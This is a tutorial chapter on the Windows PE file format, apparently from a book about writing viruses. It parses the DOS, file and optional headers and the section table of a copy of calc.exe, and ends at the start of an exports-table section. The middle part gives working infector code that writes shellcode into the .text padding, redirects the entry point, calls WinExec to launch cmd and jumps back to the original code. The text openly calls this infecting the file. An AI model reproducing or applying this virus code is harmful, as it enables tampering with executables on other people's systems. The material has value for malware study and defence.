Windows PE File Format
|
Viruses are resident programs in memory, which came into being
due to the loopholes in DOS. Earlier on, they were termed as TSR – Terminate
and Stay Resident and were mostly coded in the C programming language or in
assembler. These viruses were normally found present in the boot record or in
the partition table and termed as COM file viruses. Then came a new genre of
file viruses, which were mostly seen in (.exe) executable files.
However, now the range is too large.
An executable file need not always end with the extension of exe, it can very
well be a pif (program information file) file too. Besides, viruses are greatly
seen in the form of word macros in doc files. Whatever be the file type, while
injecting a virus into a file, one must be well-conversant with its internal
structure.
This chapter explains how an
executable file can be infected, thus calling for a complete cross-section of
an exe file.
Prior to the Windows operating
system, there was only DOS which had its own executable file format. The
designers of Windows created their own executable file format called the PE or
Portable Executable file format. However, this file format was totally
different from that of DOS. The windows operating system had the capability of
understanding the DOS exe file format but the reverse would need a miracle.
Thus if average joe executes a dos exe file under windows, the windows
operating system would handle it, but
if the reverse happened, i.e. a windows exe file under DOS, then DOS would get
all lost and refuse to recognize the file as an exe file and emit a cryptic
error 'Bad Command or file name'.
This indeed would lead to great
confusion for the average user. Thus to straighten things out, all windows
files start with a valid DOS header. As a result, if a windows executable was
given to dos, it would display a polite message 'This program must be run under
Windows.
The programs given below display the
internal structure of a windows file but in a 'one step at a time' approach.
a.cpp
#include <windows.h>
#include <stdio.h>
HANDLE hfile,hfile1;
unsigned char *mappedfile;
void main()
{
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
mappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
printf("hfile=%p hfile1=%p
mappedfile=%p\n",hfile,hfile1,mappedfile);
}
>copy c:\winnt\system32\calc.exe
test.exe
Output
hfile=00000030 hfile1=0000002C
mappedfile=00310000
As our code follows the rules of C++, the header files, windows.h and stdio.h
are required to bring in the prototypes. Header files are also significant when macros and structure tags are used in
the program.
In order to inject the code in
an exe file, i.e. test.exe, the file needs to be opened. Therefore, the
CreateFile function is used with the filename as one of its parameter. The file
test.exe is a copy of the calculator program calc.exe.
This function takes seven parameters
of which only three are useful. The first is the name of the program, the
second the mode the file is to be opened in, in our case read and write and
finally the fourth parameter specifies that if the file already exists on disk,
then it should be opened rather than creating it. The function CreateFile opens
the file for reading and writing as per our program and returns a HANDLE to
this file.
A return value of handle which is
basically a typedef to a void * is a technique windows uses to convey the
message that the variable hfile is out of bounds. This variable cannot be used
in any way other than a function parameter, thus displaying its value is simply
of no use.
The file test.exe is loaded into
memory through an array using the functions that accomplish this task. Thus it
is not a difficult job, but any changes made to this file will be in memory and
not on disk hence 'saving to disk' task
has to be done manually. Nevertheless, with the help of two functions,
CreateFileMapping and MapViewOfFile the file is loaded into memory.
The first function, CreateFileMapping takes one more parameter besides the file handle.
This paramter gives the write permission to the file. The MapViewOfFile
function specifies the access rights and the value returned by it is a void *
and hence the cast. Casting is a necessary evil while coding in C++ .
The value of mappedfile shown as
310000 is where the contents of the file test.exe are loaded and our next
program simply verifies this declaration.
a.c
#include <windows.h>
#include <stdio.h>
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
void main()
{
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
printf("%c%c\n",*pmappedfile,*(pmappedfile+1));
*pmappedfile = 65;
}
Output
MZ
This program displays the first two
bytes of an exe file under windows. These happen to be the ASCII values of M
and Z. Every file under DOS begins with a signature MZ. Again, as every file
under windows is also a DOS file , the above signature are visible there too
and the output simply proves this point. Next, the first byte is changed to A
or 65 from M.
When the program quits out, the
system changes the first byte of test.exe on the disk also . Now try executing
test.exe at the dos prompt. You will
see an error stating that the file is not a
valid Windows executable.
Undo the above damage by changing the
last line in the program to
*pmappedfile ='M';
and run the program. The file
test.exe now executes as before.
a.c
#include <windows.h>
#include <stdio.h>
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
void main()
{
hfile = CreateFile("test.exe",GENERIC_WRITE
| GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
printf("e_lfanew=%d\n",pimagedosheader->e_lfanew);
}
Output
200
We would like to repeat ourselves
that every executable file under windows starts with a dos program and the
first two bytes have to be MZ. Once the DOS program ends, then comes the
windows header . Microsoft did not hard code the size of this dos program but
with the DOS file header comes one field e_lfanew which stores the size of the
DOS program. This value in our case is 200 .
a.c
#include <windows.h>
#include <stdio.h>
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
void main()
{
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char *)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
printf("%c%c %d
%d\n",*dummy,*(dummy+1),*(dummy+2),*(dummy+3));
IMAGE_FILE_HEADER * pimagefileheader
= (IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
printf("Machine=%x\n",pimagefileheader->Machine);
printf("NumberOfSections=%d\n",pimagefileheader->NumberOfSections);
printf("TimeDateStamp=%d\n",pimagefileheader->TimeDateStamp);
printf("PointerToSymbolTable=%d\n",pimagefileheader->PointerToSymbolTable);
printf("NumberOfSymbols=%d\n",pimagefileheader->NumberOfSymbols);
printf("SizeOfOptionalHeader=%d\n",pimagefileheader->SizeOfOptionalHeader);
printf("Characteristics=%x\n",pimagefileheader->Characteristics);
}
Output
PE 0 0
Machine=14c
NumberOfSections=3
TimeDateStamp=938257211
PointerToSymbolTable=0
NumberOfSymbols=0
SizeOfOptionalHeader=224
Characteristics=30f
In the next program, a variable called
dummy is created that points to the location where file test.exe is loaded in
memory. The value stored in e_lfanew which is 200 is then added to this
location. The first four bytes at this position refer to the signature of the
file. The output is signature of a PE file PE 00. All valid executables under
windows must start with this signature.
After this magic number starts a
header or structure called Image File Header which is defined in the header
file winnt.h. The variable pimagefileheader is created to hold the start of
this structure and then all the members of the structure are displayed. The
first member is called Machine with a value of 0x14c.
This means that the machine the
program is compiled on is either a 386 or a 486 or a 586. Each family of
microprocessors has it own unique value. For example a DEC alpha would have a
value of 0x183 and the MIPS 4000 0x166. At present, these machines are only
seen in museums.
An exe file has different fragments like
code, data, resources etc. These different entities cannot be mixed up and
placed together. They require their own space for various reasons for eg, code
is executable whereas data is not. Thus different entities are placed in
different compartments or sections. The second member of the structure gives a
count on the sections in the file. A little later in this chapter, we will
display the details of every section. For now, we have three sections.
The next field is the number of
seconds from the 31st of December 1969 4 PM that this file was
created by the linker. The documentation does not give any details whether the
time shown is when the linker started
creating the file or stopped creating.
The PE file format also applies to
obj files created by the complier and the next two fields deal with symbols
which is what the compiler understand. Just to clarify, every function to the
compiler is a symbol.
The second last field holds the size
of the next structure called the Image Optional Header which is 224. This
header follows the Image File Header.
The next example displays the members of this gigantic structure.
The last field gives some more
information about the exe file in a series of bits. If the first bit is on,
then there are no relocations in the file. Similarly the second bits decides
whether the file is an obj or an exe file etc.
a.c
#include <windows.h>
#include <stdio.h>
void main()
{
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
printf("Magic=%x\n",pimageoptionalheader->Magic);
printf("MajorLinkerVersion=%d\n",pimageoptionalheader->MajorLinkerVersion);
printf("MinorLinkerVersion=%d\n",pimageoptionalheader->MinorLinkerVersion);
printf("SizeOfCode=%ld\n",pimageoptionalheader->SizeOfCode);
printf("SizeOfInitializedData=%ld\n",pimageoptionalheader->SizeOfInitializedData);
printf("SizeOfUninitializedData=%ld\n",pimageoptionalheader->SizeOfUninitializedData);
printf("AddressOfEntryPoint=%x\n",pimageoptionalheader->AddressOfEntryPoint);
printf("BaseOfCode=%x\n",pimageoptionalheader->BaseOfCode);
printf("BaseOfData=%x\n",pimageoptionalheader->BaseOfData);
printf("ImageBase=%x\n",pimageoptionalheader->ImageBase);
printf("SectionAlignment=%x\n",pimageoptionalheader->SectionAlignment);
printf("FileAlignment=%x\n",pimageoptionalheader->FileAlignment);
printf("MajorOperatingSystemVersion=%d\n",pimageoptionalheader->MajorOperatingSystemVersion);
printf("MinorOperatingSystemVersion=%d\n",pimageoptionalheader->MinorOperatingSystemVersion);
printf("MajorImageVersion=%d\n",pimageoptionalheader->MajorImageVersion);
printf("MinorImageVersion=%d\n",pimageoptionalheader->MinorImageVersion);
printf("MajorSubsystemVersion=%d\n",pimageoptionalheader->MajorSubsystemVersion);
printf("MinorSubsystemVersion=%d\n",pimageoptionalheader->MinorSubsystemVersion);
printf("Win32VersionValue=%d\n",pimageoptionalheader->Win32VersionValue);
printf("SizeOfImage=%d\n",pimageoptionalheader->SizeOfImage);
printf("SizeOfHeaders=%d\n",pimageoptionalheader->SizeOfHeaders);
printf("CheckSum=%d\n",pimageoptionalheader->CheckSum);
printf("Subsystem=%d\n",pimageoptionalheader->Subsystem);
printf("DllCharacteristics=%x\n",pimageoptionalheader->DllCharacteristics);
printf("SizeOfStackReserve=%x\n",pimageoptionalheader->SizeOfStackReserve);
printf("SizeOfStackCommit=%x\n",pimageoptionalheader->SizeOfStackCommit);
printf("SizeOfHeapReserve=%x\n",pimageoptionalheader->SizeOfHeapReserve);
printf("SizeOfHeapCommit=%x\n",pimageoptionalheader->SizeOfHeapCommit);
printf("LoaderFlags=%d\n",pimageoptionalheader->LoaderFlags);
printf("NumberOfRvaAndSizes=%d\n",pimageoptionalheader->NumberOfRvaAndSizes);
}
Output
Magic=10b
MajorLinkerVersion=5
MinorLinkerVersion=12
SizeOfCode=75264
SizeOfInitializedData=15872
SizeOfUninitializedData=0
AddressOfEntryPoint=134ef
BaseOfCode=1000
BaseOfData=14000
ImageBase=1000000
SectionAlignment=1000
FileAlignment=200
MajorOperatingSystemVersion=5
MinorOperatingSystemVersion=0
MajorImageVersion=5
MinorImageVersion=0
MajorSubsystemVersion=4
MinorSubsystemVersion=0
Win32VersionValue=0
SizeOfImage=102400
SizeOfHeaders=1536
CheckSum=113241
Subsystem=2
DllCharacteristics=8000
SizeOfStackReserve=40000
SizeOfStackCommit=1000
SizeOfHeapReserve=100000
SizeOfHeapCommit=1000
LoaderFlags=0
NumberOfRvaAndSizes=16
This program displays the members of
the Image Optional Header which are used to write our so called virus. The header
starts after the Image File Header, so the size of Image File header is added
to the pointer that points to the start of the Image file header.
A short description of some of the
fields.
This header starts with its own magic
number, 0x10b. This is followed by the major and minor number of the linker
that produced the exe file. In our case it is 12.5. Then comes the size of code
in bytes present in the file, 75264.
The size of Initialized data is meant for variables that have been initialized.
The size of UnInitialized data is the space taken in memory when the file is
loaded but no space is reserved for the file on disk. The next field is the most crucial one called the entry point.
This field has an address which is presently a value of 0x134ef. This is the address of the first
instruction that will be executed in memory. This field is defined to be an RVA
or a relative virtual address.
The operating system has not been
given any instruction as to where it should load the program in memory. However
it uses the value stored in the field called ImageBase, which in our case is
1000000. Once it identifies this position, the loader then jumps to address 0x134ef, base of code, from this
image base to execute the first instruction. This instruction actually is thus
stored at 1000000 plus 0x134ef, i.e.
0x10134ef. Thus to calculate the actual address we add the Image Base to the
RVA. An RVA is always an address from the Image base.
The
Base Of code holds the address of the code in memory, and this value is also
given in the section table. The next field Base of Data is about the data
section when loaded in memory which again is available in the section headers.
The
section alignment refers to the start of section in memory. In windows, the
section alignment is usually 4096 bytes which means that every section will
begin in memory at multiple of 4096. Thus if the code section is 90 bytes, then
the data section to follow will begin 4006 bytes later and the memory area in
the middle will be left unused. The file alignment is normally the sector size
i.e. 512 bytes.
Each
section on disk begins on a new sector, so even when a section is 5 bytes large
the remaining 507 bytes are yet kept allocated for the same though unused. The
rest of the fields are of academic interest to us as of now.
a.c
#include <windows.h>
#include <stdio.h>
struct section {
BYTE Name[8];
DWORD VirtualSize;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
char a[16];
};
void main()
{
section *sec;
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
sec = (struct section*)((char
*)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
printf("Section PointerToRawData SizeOfRawData VirtualAddress VirtualSize\n");
for (int
i=0;i<pimagefileheader->NumberOfSections;i++)
{
printf("%s %05x %05x
%05x
%05x\n",sec[i].Name , sec[i].PointerToRawData,sec[i]. SizeOfRawData,sec[i].VirtualAddress,sec[i].VirtualSize);
}
}
Output
Section PointerToRawData SizeOfRawData VirtualAddress VirtualSize
.text 00600 12600
01000 124ee
.data 12c00 00c00
14000 010c0
.rsrc 13800 02c00
16000 02b98
This program proceeds further to
display the details of the section headers that immediately follow the Image
Optional header. There is one section header per section and the size of each
header is 40 bytes. A structure called section is created knowing that there is
one in winnt.h just to explain things better. Even though we are interested in
the first five members only, we yet need a structure 40 bytes long as thee
section headers are stored back to back. This explains the padding of 16 bytes
towards the end.
The Image File header has a member
which gives the number of sections present in the executable. Thus using a for
loop details of each section can be displayed.
The first member of the header is
always the name of the section which starts with a dot generally and is
restricted to 8 bytes. The section that carries code is always called .text,
the one carrying data .data and the one carrying resources, ,rsrc. Even though
the above name are predefined, using the compiler options, we can create our
own sections and give it user-defined names that may not start with a dot.
The next member even though is called
Virtual Size is the actual size of the section data. Similarly, there is one
more field called Size of Raw Data which is the same value but rounded up to
the section size on disk i.e. 512 bytes.
The field PointerToRawData is the
position or offset of the section on disk. Thus its value is a multiple of
section alignment or 512 bytes. The loader uses this concept to identify where
each section starts on disk.
The VirtualAddress field is the
offset when the section is loaded in memory where all values are a multiple of
1000 hex. This is where the sections are to be found in memory.
a.c
#include <windows.h>
#include <stdio.h>
struct section {
BYTE Name[8];
DWORD VirtualSize;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
char a[16];
};
void main()
{
unsigned char vcdcode[]="\xcc";
section *psection;
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
long positionofvcd;
int howmanyzeroes=0,i;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
psection = (struct section*)((char
*)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
int totalsize =
psection->PointerToRawData + psection->SizeOfRawData;
for(positionofvcd=psection->PointerToRawData;positionofvcd
<= totalsize;positionofvcd++)
{
if(pmappedfile[positionofvcd]==0)
{
howmanyzeroes++;
if(howmanyzeroes==69)
break;
}
else
howmanyzeroes=0;
}
positionofvcd -= 65;
printf("positionofvcd=%x\n",positionofvcd);
pimageoptionalheader->AddressOfEntryPoint
= positionofvcd + psection->VirtualAddress - psection->PointerToRawData;
int sizeofvcd = sizeof(vcdcode);
for(i =0; i<sizeofvcd ;i++)
pmappedfile[positionofvcd+i]=vcdcode[i];
}
Output
positionofvcd=12af3
We
have attempted to do something significant in this program. On executing the above
program, the program test.exe gets infected but in a rather unique way. Thus
when the executable test.exe is started, it displays a message box stating that
a breakpoint interrupt has been called. This thus implies that instead of the
code of the program test.exe being called, the breakpoint interrupt 0xcc has
been encountered.
Now
to the workings.
A variable totalsize is initialized
to denote an offset that points to the end of the section. This offset is
achieved by adding the SizeOfRawData to the PointerToRawData field which points
to the section start.
The next goal is to find the place in
the .text section where there are 69 consecutive zeroes. This position within the .text section is required as we
will be copying our code or vcd (virus code) here thus not overwriting the
actual code. The text section like all other sections will be zero or null
padded till it reaches the section alignment. Thus finding 69 consecutive
zeroes is not too difficult.
In the for loop, the variable
positionofvcd is set to the start of the .text section on disk. Nevertheless,
in an extreme case where we cannot find 69 consecutive zeroes, we would like
the loop to terminate when it reaches the end of the sections.
The file on disk and the bytes in
pmappedfile array is the same, so we check the byte in memory since it is
easier using the array notation. The pmappedfile refers to the start of memory
where the file is loaded and positionofvcd is the offset. When the value at the
offset is zero, the variable howmanyzeroes is incremented by one.
Thus at any point in time variable
howmanyzeroes gives a count on the consecutive zeroes passed over. Also, when a
non zero value is encountered, the else block gets called where the variable is
reset to 0 again. Simultaneously, in the if statement a check is performed
whether the variable howmanyzeroes is 69. If so, the loop is terminated as 69
consecutive zeroes in the file have been found.
The offset variable positionofvcd
however is at the end of the 69 consecutive zeroes. Therefore to reposition it
to the start, the value must be subtracted by 69. We subtract 65 instead just
to keep 4 zeroes. What is 4 zeroes between us. This shows no errors and
everything works as advertised.
The next task is to change the entry
point RVA. Just to refreshen your memory, the entry point points to the first
byte of code that is to be executed and it is an RVA. The value for this field
should now point to the start of 65 consecutive zeroes.
The position of vcd is an offset from
the start of the file and therefore the start of the section stored in the
PointerToRawData member of the section structure is subtract from it. The sec
variable points to the .text section thereby giving an offset from the
beginning of the text section. However our objective is to get the offset from
the image base and therefore the Sections VirtualAddress stored in the section
structure is added to convert it into an RVA. If we execute the program at this
stage, the loader would load test.exe into memory and then executed our code
which simply comprises 65 consecutive zeroes.
So the next job is to add our code
that is to executed. For this purpose, an array of chars called vcdcode is
created which currently holds only one byte, i.e. CC the op code for a breakpoint.
Later the actual code will be inserted in this array. The code bytes of this
array is copied at the memory location of the consecutive zeroes. The variable
positionofvcd has the offset as to where these bytes need to be copied. The
system as always will write these bytes to disk.
In this manner, the first of the
zeroes is replaced with a breakpoint. Now, when we run our program and then run
test, we see the breakpoint interrupt generated. Simply click on ok and proceed
to the next program that does much more.
a.c
#include <windows.h>
#include <stdio.h>
struct section {
BYTE Name[8];
DWORD VirtualSize;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
char a[16];
};
void main()
{
unsigned
char vcdcode[] = "\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";
section *psection;
HMODULE hloadlibrary;
HANDLE hfile,hfile1;
unsigned char *pmappedfile, *dummy;
long positionofvcd,haddresoffunction;
int howmanyzeroes=0,i;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
dummy = (unsigned char *)(pmappedfile +
pimagedosheader->e_lfanew);
IMAGE_FILE_HEADER *pimagefileheader =
(IMAGE_FILE_HEADER *)(pmappedfile + pimagedosheader->e_lfanew +4);
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char
*)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
psection = (struct section*)((char
*)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
int totalsize =
psection->PointerToRawData + psection->SizeOfRawData;
for(positionofvcd=psection->PointerToRawData;positionofvcd
<= totalsize;positionofvcd++)
{
if(pmappedfile[positionofvcd]==0)
{
howmanyzeroes++;
if(howmanyzeroes==69)
break;
}
else
howmanyzeroes=0;
}
positionofvcd -= 65;
pimageoptionalheader->AddressOfEntryPoint
= positionofvcd + psection->VirtualAddress - psection->PointerToRawData;
int sizeofvcd = sizeof(vcdcode);
hloadlibrary =
LoadLibrary("kernel32.dll");
haddresoffunction = (unsigned
long)GetProcAddress(hloadlibrary,"WinExec");
for (i = 0; i < 4 ; i++)
vcdcode[sizeofvcd-10+i] =
haddresoffunction >> (i * 8);
for(i =0; i<sizeofvcd ;i++)
pmappedfile[positionofvcd+i]=vcdcode[i];
}
The best way to understand this
program is to run it and see the code being executed in the debugger. Thus at
the breakpoint interrupt click on cancel. The code shown below is displayed in
the debug window and it is similar to what is written in the vcdcode array.
Just to sum up. The entry point RVA
is changed to point to the newly inserted code and then file test.exe is
executed. The breakpoint interrupt gets called. The bytes that we have in the
vcdcode array are disassembled as
Output
CC int
3
55 push
ebp
8B EC mov ebp,esp
51 push
ecx
C7 45 FC 63 6D 64 00 mov dword ptr [ebp-4],646D63h
6A 05 push
5
8B C5 mov
eax,ebp
83 E8 04 sub
eax,4
50 push
eax
B8 AF A7 E9 77 mov eax,77E9A7AFh
FF D0 call
eax
8B E5 mov
esp,ebp
5D pop
ebp
The explanation for the assembler
code is the same, as from the previous chapter.
The first instruction is the
breakpoint interrupt CC. Then 55 becomes push ebp. One of the many reasons a
register is pushed on the stack is because its value is to be changed and
eventually the original value is to be restored at the end of the code. A
simple rule in assembler is whenever a register is changed, like decent people
once the task is done, it has to be restored back to its original value. The
next instruction replaces the contents of the ebp register with that of esp.
The esp register tracks down the stack each time a value is pushed or popped
off it. Thus by storing a copy of esp in ebp which will not be changed, we now
have a reference to original position of the stack is prior to the vcd code
being called. Besides there is now a fixed reference point off the stack to
refer to values on the stack. When our vcd code finishes, it should restore the
stack to its original value. Thus the vcd code should once again copy ebp back
to esp to restore the stack.
The actual work starts now. We push
ecx on the stack. By pushing its value, we have actually allocated 4 memory
locations on the stack, though its value is insignificant for the moment. The
stack moves down by 4 and hence the difference between esp and ebp will be 4.
Thus ebp-4 will represent the value we have just pushed on the stack.
The string cmd is to be placed on the
stack. Thus the next instruction copies the ASCII values of c, m and d 63,6d
and 64 on the stack at ebp-4, the position where we pushed the value of the ecx
register. Being a little endian machine the 63h or c comes last. The square
brackets in assembler reference a pointer.
If ebp had a value 100, then
characters cmd would be stored at locations 96 onwards. Thus we have allocated
4 bytes on the stack and copied our string there. In assembler, we are allowed
to write to memory that has been previously allocated.
The WinExec function takes two
parameters, the name of the program to be executed and the initial mode the
window should be open in, The value 5 means normal, therefore we push 5 on the
stack, the parameters are to be pushed in the reverse way. Then the address of
where the string cmd starts in memory is to be placed which in our case is
ebp-4.
-*-*-*
To make matters easier, we first mov
ebp into eax, subtract 4 from it and then push this value on the stack.
Finally, the function WinExec is called. However, our problem is that we have
no clue where this function starts in memory. Thus we use function LoadLibrary
to retrieve the address location of kernel32.dll as this dll that contains the
code of the WinExec functions starts in memory.
Then using function GetProcAddress,
we retrieve the address of this function in the dll and thus in memory. Once
the value is attained, using the mov instruction this value is placed into the
eax register. The op code B8 followed by the address in memory of our function
does this job. Then the address of WinExec is to be placed at this point which
is 10 bytes from the end. For this reason, we extract each bytes of the address
of WinExec which is 77e9a7af and place in into our array vcdcode. This value of
WinExec will change from Windows version to version and service pack and hence
it is not hard coded.
Once its address is obtained, it is
moved into the eax register and then the call eax op code is used to call the
code of WinExec. Resultantly, this opens the DOS command box.
Mission Accomplished.
The clean up task now requires the
stack to be placed back to its original so we move the value of ebp back into esp,
thus saving the value of ebp on the stack. As the stack is now on this value,
we simply pop the original value of ebp back into the ebp register.
A small glitch here is that in spite
of opening the dos box, the original code does not get called at all. This is
rectified in the next program.
All that this program does is hands
over control back to the original code.
a.c
#include <windows.h>
#include <stdio.h>
struct section {
BYTE Name[8];
DWORD VirtualSize;
DWORD VirtualAddress;
DWORD SizeOfRawData;
DWORD PointerToRawData;
char a[16];
};
void main()
{
unsigned char
vcdcode[]="\xcc\x55\x8B\xEC\x51\xC7\x45\xFC\x63\x6D\x64\x00\x6A\x05\x8b\xc5\x83\xe8\x04\x50\xB8\xcc\xcc\xcc\xcc\xFF\xD0\x8B\xE5\x5d";
section *psection;
HMODULE hloadlibrary;
HANDLE hfile,hfile1;
unsigned char *pmappedfile;
long positionofvcd,haddresoffunction;
int howmanyzeroes=0,i;
hfile =
CreateFile("test.exe",GENERIC_WRITE |
GENERIC_READ,0,0,OPEN_EXISTING,0,0);
hfile1 = CreateFileMapping (hfile, 0,
PAGE_READWRITE, 0, 0, 0);
pmappedfile = (unsigned char
*)MapViewOfFile(hfile1,FILE_MAP_ALL_ACCESS,0,0,0);
IMAGE_DOS_HEADER
*pimagedosheader = (IMAGE_DOS_HEADER
*)pmappedfile;
IMAGE_OPTIONAL_HEADER
*pimageoptionalheader = (IMAGE_OPTIONAL_HEADER *)((unsigned char *)pimagefileheader+sizeof(IMAGE_FILE_HEADER));
psection = (struct section*)((char
*)pimageoptionalheader + sizeof(IMAGE_OPTIONAL_HEADER));
int totalsize =
psection->PointerToRawData + psection->SizeOfRawData;
for(positionofvcd=psection->PointerToRawData;positionofvcd
<= totalsize;positionofvcd++)
{
if(pmappedfile[positionofvcd]==0)
{
howmanyzeroes++;
if(howmanyzeroes==69)
break;
}
else
howmanyzeroes=0;
}
positionofvcd -= 65;
long goingback =
pimageoptionalheader->AddressOfEntryPoint+pimageoptionalheader->ImageBase;
pimageoptionalheader->AddressOfEntryPoint
= positionofvcd + psection->VirtualAddress - psection->PointerToRawData;
int sizeofvcd = sizeof(vcdcode);
hloadlibrary =
LoadLibrary("kernel32.dll");
haddresoffunction = (unsigned
long)GetProcAddress(hloadlibrary,"WinExec");
for (i = 0; i < 4 ; i++)
vcdcode[sizeofvcd-10+i] =
haddresoffunction >> (i * 8);
for(i =0; i<sizeofvcd ;i++)
pmappedfile[positionofvcd+i]=vcdcode[i];
unsigned char
jumpback[]="\xB8\xbb\xbb\xbb\xbb\xff\xe0";
for (i = 0; i < 4 ; i++)
jumpback[1+i] = goingback >> (i
* 8);
for(i=0; i<7 ;i++)
pmappedfile[positionofvcd+sizeofvcd+i-1]=jumpback[i];
}
The AddressOfEntryPoint member stores
the address of code that is to be executed. Thus before changing its value to point
to our vcd code, we save the original value in a variable called goingback. The
point to be noted is that the address is an RVA therefore to reach the actual
physical address we add the ImageBase value to it.
Next is we create an array jumpback
that will carry code that jumps back to the original entry point. Once again it
starts with op code b8 that moves a value into the eax register. As before, a
for loop is used to write the actual jump address in this array using the
goingback variable.
Then these 7 bytes are added to the
end of the vcd so that after the dos box gets created and it is shut down, the
original code is executed. The actual bytes that get executed are as follows.
B8 20 24 01 01 mov
eax,1012420h
FF E0 jmp eax
The difference between a call and jmp
instruction is that in the jmp instruction the next instruction address is not
saved on the stack there is no need to return back.
Thus the code will infect a file in
such a way that each time the file is executed, a dos box gets created and then
the original code gets called.
The Exports Table.
e.c
void __declspec(dllexport) abc()
{
}
void __declspec(dllexport) pqr()
{
}
void xyz()
{
}
void aaa()
{
}
void bbb()
{
}
void ccc()
{
}
e.def
LIBRARY e.dll
EXPORTS
xyz @5
aaa @7
bbb @12
cl –c e.c
link /dll /def:e.def e.obj
The above program continues with what
we are learning about the structure of a PE file. In file e.c, there are six
functions namely abc, pqr, xyz, aaa , bbb and ccc. These six functions would be
placed in a dll, but only five of them would be allowed access by other code.
By default, code in dll is not exposed to the outside world.
There are, as always, two ways of
giving permission to access code present in the dll. The first approach is by
tagging the functions with the keyword __declspec alongwith the option
dllexport. The first two functions abc and pqr are exported in this way.
The second alternative is by using a
definitions (.def) file. A def file has a certain format, which is clearly seen
in file e.def. It starts with the reserved word Library and then the library
